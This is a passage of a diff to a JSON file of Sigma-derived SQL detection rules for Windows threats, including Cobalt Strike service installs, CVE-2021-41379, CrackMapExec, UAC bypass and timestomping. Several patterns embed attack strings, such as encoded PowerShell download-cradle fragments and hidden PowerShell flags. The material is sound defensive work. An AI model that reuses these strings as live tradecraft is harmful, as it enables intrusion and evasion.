"attack.t1557.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR Image LIKE '%\\\\chromium.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\Whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\Discord.exe' ESCAPE '\\' OR Image LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR Image LIKE '%\\\\msteams.exe' ESCAPE '\\' OR Image LIKE '%\\\\Slack.exe' ESCAPE '\\' OR Image LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": "win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1068" ], "falsepositives": [ - "Highly unlikely" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": "test", - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "title": "CrackMapExec File Creation Patterns", + "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "status": "experimental", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Unknown" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": "win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "status": "experimental", - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Unusual File Modification by dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": "file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "title": "File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((Image LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "status": "experimental", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '22' 